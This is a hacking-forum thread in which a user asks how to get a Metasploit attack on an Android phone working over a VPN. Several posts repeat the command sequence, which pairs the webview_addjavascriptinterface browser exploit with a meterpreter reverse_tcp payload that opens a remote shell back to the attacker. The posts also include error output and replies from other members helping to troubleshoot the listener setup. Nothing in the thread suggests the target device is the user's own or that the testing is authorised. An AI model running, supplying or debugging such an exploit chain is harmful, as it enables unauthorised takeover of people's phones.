Sinisterly
Android hacking without file with Metasploit. - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.li/Forum-Hacking-Tools)
+--- Thread: Android hacking without file with Metasploit. (/Thread-Android-hacking-without-file-with-Metasploit)



Android hacking without file with Metasploit. - Hack3rcon - 02-19-2020

Hello,
I want to hack an Android cell phone with the Metasploit. I did below commands:
Code:
use exploit/android/browser/webview_addjavascriptinterface set payload android/meterpreter/reverse_tcp set srvhost VPN IP set lhost VPN IP set lport 4444 run
My system connected to a VPN server and when I set the VPN IP as "srvhost" and "lhost" then it show me below error:
Code:
[*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [-] Handler failed to bind to VPN IP:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (VPN IP:8080).
Can I use the Metasploit with VPN?

Thank you.


RE: Android hacking without file with Metasploit. - Sartux - 02-19-2020

(02-19-2020, 12:51 PM)Hack3rcon Wrote: Hello,
I want to hack an Android cell phone with the Metasploit. I did below commands:
Code:
use exploit/android/browser/webview_addjavascriptinterface set payload android/meterpreter/reverse_tcp set srvhost VPN IP set lhost VPN IP set lport 4444 run
My system connected to a VPN server and when I set the VPN IP as "srvhost" and "lhost" then it show me below error:
Code:
[*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [-] Handler failed to bind to VPN IP:4444:-  - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (VPN IP:8080).
Can I use the Metasploit with VPN?

Thank you.

Hi, basically you need to set the LHOST to the VPN, not your internal address. You can find more info here:
https://security.stackexchange.com/questions/119100/meterpreter-session-over-vpn

Not to be rude, but that took 2 seconds to Google so please try and give that a go first before asking questions.


RE: Android hacking without file with Metasploit. - Hack3rcon - 02-23-2020

(02-19-2020, 01:36 PM)Sartux Wrote:
(02-19-2020, 12:51 PM)Hack3rcon Wrote: Hello,
I want to hack an Android cell phone with the Metasploit. I did below commands:
Code:
use exploit/android/browser/webview_addjavascriptinterface set payload android/meterpreter/reverse_tcp set srvhost VPN IP set lhost VPN IP set lport 4444 run
My system connected to a VPN server and when I set the VPN IP as "srvhost" and "lhost" then it show me below error:
Code:
[*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [-] Handler failed to bind to VPN IP:4444:-  - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (VPN IP:8080).
Can I use the Metasploit with VPN?

Thank you.

Hi, basically you need to set the LHOST to the VPN, not your internal address. You can find more info here:
https://security.stackexchange.com/questions/119100/meterpreter-session-over-vpn

Not to be rude, but that took 2 seconds to Google so please try and give that a go first before asking questions.

Thank you, but I got below error:
Code:
> exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [-] Handler failed to bind to VPN IP:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Using URL: http://0.0.0.0:8080/ibo [*] Local IP: http://10.7.1.8:8080/ibo [*] Server started.



RE: Android hacking without file with Metasploit. - Hack3rcon - 02-24-2020

Any idea? As you see, i set the VPN IP.


RE: Android hacking without file with Metasploit. - taylostolo - 02-25-2020

(02-24-2020, 11:04 PM)Hack3rcon Wrote: Any idea? As you see, i set the VPN IP.
look at your URL looks a little off to me 0.0.0.0?